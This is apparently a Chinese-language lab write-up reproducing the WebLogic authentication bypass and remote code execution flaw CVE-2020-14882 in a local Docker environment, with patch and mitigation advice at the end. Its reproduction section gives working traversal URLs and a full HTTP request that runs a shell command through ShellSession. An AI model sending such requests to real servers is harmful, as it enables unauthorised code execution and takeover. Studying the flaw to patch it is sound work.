CVE-2020-14882 WebLogic远程代码执行漏洞复现

川长思鸟来 2022-12-28 11:08 276阅读 0赞

### Weblogic简介 ###

*  WebLogic Server是美国Oracle公司的主要产品之一，其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用，是商业市场上主要的Java(J2EE)应用服务器软件之一。

### 漏洞描述 ###

*  2020年10月28日，Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞（CVE-2020-14882）POC被公开，远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ，并执行任意代码。
 *  2020年10月29日, Oracle发布的漏洞补丁CVE-2020-14882存在可绕过的0day漏洞。即在Weblogic补丁更新完成后，攻击者仍可绕过WebLogic后台登录等限制，并控制Weblogic服务器。
 *  造成的风险和危害极大。漏洞详情如下：

![在这里插入图片描述][2020121720063527.png]

### 影响版本 ###

<table> 
 <thead> 
  <tr> 
   <th></th> 
  </tr> 
 </thead> 
 <tbody> 
  <tr> 
   <td>Oracle Weblogic Server 10.3.6.0.0</td> 
  </tr> 
  <tr> 
   <td>Oracle Weblogic Server 12.1.3.0.0</td> 
  </tr> 
  <tr> 
   <td>Oracle Weblogic Server 12.2.1.3.0</td> 
  </tr> 
  <tr> 
   <td>Oracle Weblogic Server 12.2.1.4.0</td> 
  </tr> 
  <tr> 
   <td>Oracle Weblogic Server 14.1.1.0.0</td> 
  </tr> 
 </tbody> 
</table>

### 环境搭建 ###

dockers搭建命令：

Cd /vulhub-master/weblogic/CVE-2020-14882
    Sudo docker-compose up -d

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]

> http://192.168.232.146:7001/console/login/LoginForm.jsp  
> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]

### 漏洞复现 ###

#### 方法一： 使用exploit.poc执行命令 ####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]  
![在这里插入图片描述][20201217200820191.png]

#### 方法二： 数据包，重放，执行命令 ####

http://192.168.232.146:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]

http://192.168.232.146:7001/console/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=UnexpectedExceptionPage

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]

#### 方法三：写入文件 ####

GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/20201216qwe');"  HTTP/1.1
    Host: 192.168.232.146:7001
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: ADMINCONSOLESESSION=o-RqTvK1ODOZXxpZc0eIFmAeQPysZ1HsxYwPd2D0jiEMpTwpb4xJ!-585458242
    Upgrade-Insecure-Requests: 1
    X-Forwarded-For: 127.0.0.1

![在这里插入图片描述][20201217200904796.png]  
![在这里插入图片描述][20201217200908270.png]

### 修复建议 ###

安装官方最新补丁进行升级：

> https://www.oracle.com/security-alerts/cpuapr2020.html

临时措施：  
由于该漏洞的补丁存在被绕过的风险，建议临时关闭后台/console/console.portal对外访问。

### 参考链接 ###

> https://www.venustech.com.cn/new\_type/aqtg/20201030/21995.html

### 笔记下载 ###

> https://download.csdn.net/download/qq\_41901122/13704233

### 摘抄 ###

--------------------

这世界大部分的抒情，  
都会被认为无病呻吟，  
能够理解你得了什么病，  
基本都是知己。

\-----《云边有个小卖部》

--------------------

[2020121720063527.png]: /images/20221120/36e2e0cf082c48549d9715a0d6e47b50.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221120/015d111d5ce645ce84d8947c00493b21.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: /images/20221120/5948d7347c2148caa85396baaf4f8c2f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221120/b3cebb2294f04fb58aad8c42b6005988.png
[20201217200820191.png]: /images/20221120/cb5d80d5a9324fe1a8350cdf3c31d3d1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221120/30676b7dc9074f15bdc49a3509286335.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20221120/46aaa5e41f9a40e9bd66bb293843bf82.png
[20201217200904796.png]: /images/20221120/ceb42e9f1b4543ecbe109448d4958bdb.png
[20201217200908270.png]: /images/20221120/0ed89cec2c8547dabbe43161316524e8.png